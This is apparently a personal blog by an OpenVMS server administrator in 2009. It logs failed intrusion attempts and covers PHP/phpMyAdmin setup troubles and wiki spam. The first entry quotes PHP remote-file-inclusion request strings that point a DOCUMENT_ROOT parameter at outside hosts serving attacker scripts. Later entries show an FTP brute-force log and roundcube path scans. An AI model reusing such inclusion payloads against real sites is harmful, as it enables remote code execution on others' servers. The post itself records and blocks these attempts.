Posted on

21-Aug-2009

Korean visitors
Checking yesterday’s system load this morning, there had been a spike in buffered IO about 22:30; Checked the webserver access log, and found just one address 203.236.100.30 that fired requests, hoping one would pass it to another machine to break in. all requests contain a string:

/?_SERVER[DOCUMENT_ROOT]=http://www.nglschool.co.kr/zfxid.txt?

This morning, even more similar attempts have been made from address 211.206.123.177 appeared at 5:30, keeping the system even more busy for a while trying to script:

/?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt??

Using WHIOS, it looks like both addresses are registered in Korea: The first one is registered to kornet.kr, the second one to broadnet.com.
There have been some more attempts, none of them as heavy as the the second mentioned: that one boosted the server to handle 300 requests per minute, for a small system like this, and accessing the PHP and Wiki engines. Without a problem: all requests ended in a 403 error.
The next hurdle on PHP
As found yesterday, it seems to work: PHP_INFO shows what it should show. So it’s time to handle the real stuff: I downloaded the latest version of phpmyadmin and had it access the database on Diana in it’s configuration. After some mapping issues, PHPMyAdmin did start, but next issued an error “extension “Session” cannot not be loaded; chedck your configuration” though the file does exists and the webservers do have READ + EXECUTE access to all files – and the directory path th them. So I thought, but some seemed missing the required ACL, so I added the lines. Next, MyPhpAdmin complains that the MySQL extension couldn’t be loaded – and it is obvious I need just that one.

If that doesn’t work, there is no need to test WordPress….

Posted on

25-Jul-2009

FTP attack
The FTP log has increased in size yesterday – about 350 Kb, just by one address thinking this is a Windows box might have been easy to crack – or crash:

%TCPIP-I-FTP_SESCON, FTP SERVER: session connection from 121.124.27.222 at 24-JUL-2009 14:55:16.70
%TCPIP-E-FTP_LOGFAL, remote interactive login failure Administrator
-TCPIP-I-FTP_NODE, client host name: 121.124.27.222
-LOGIN-F-NOSUCHUSER, no such user

and it continues with this username – 2282 times. According the online system performance logs, it has taken about 30 minutes: elevated CPU activity and paging (maibnly soft-paging) and a bit more direct and buffered IO. Nothing hazardous – it’s not a Windows box, though the person trying seems to think so.
I checked tha address – and it’s Korean. The ISP it belongs to, has been notified of this abuse attempt.

Main page to be updated
I also noticed that the main page hasn’t been updated after last boot, following the power outage. Shame on me – but it will be taken care of tomorrow.

And by the way: IssiNoho – the VAMP site – is back inline again – though not yet on OpenVMS but Iain is working on it. So I revived the link 🙂

Posted on

10-Mar-2009

VMSWiki actions
In the last few days, several new “accounts” have been created in the wiki – bogus names and bogus email-addresses. At least, the didn’t look like valid ones (though I won’t rule out they could be valid). But now I get an email if an account has been created, and that lessens the need to scan the webserver access-logfile for abuse of the wiki.
But still, access to the files I deleted earlier is still attempted – from several places wordlwide, including search engines. So I added a rule that any accessing “/vmswiki/AirTickets*” raises an error other than “ERROR 404 – The requested resource could not be found“. It now raises “ERROR 501 – The requested action is not implemented by this server“. Practically, this is what’s I did: by this mapping I removed the possible activity 😀
The number of attempts to access these pages has since dropped.
Nevertheless, I’ll keep a close look on the we activity.

Posted on

15-Jan-2009

New kikd on the block?
Since last week, most rejected requests are the same sequence:

aaa.bbb.ccc.ddd - - [11/Jan/2009:21:37:14 +0100] "GET /nonexistenshit HTTP/1.1" 302 341
aaa.bbb.ccc.ddd - - [11/Jan/2009:21:37:15 +0100] "GET /mail/bin/msgimport HTTP/1.1" 302 341
aaa.bbb.ccc.ddd - - [11/Jan/2009:21:37:16 +0100] "GET /bin/msgimport HTTP/1.1" 302 341
aaa.bbb.ccc.ddd - - [11/Jan/2009:21:37:17 +0100] "GET /rc/bin/msgimport HTTP/1.1" 302 341
aaa.bbb.ccc.ddd - - [11/Jan/2009:21:37:18 +0100] "GET /roundcube/bin/msgimport HTTP/1.1" 302 341
aaa.bbb.ccc.ddd - - [11/Jan/2009:21:37:19 +0100] "GET /webmail/bin/msgimport HTTP/1.1" 302 341

It seems a new scripts has become available. It won’t work here, and if I had this type of software, I would disable it immediately. Still to find out what package that may be; ot it’s somewhat standard.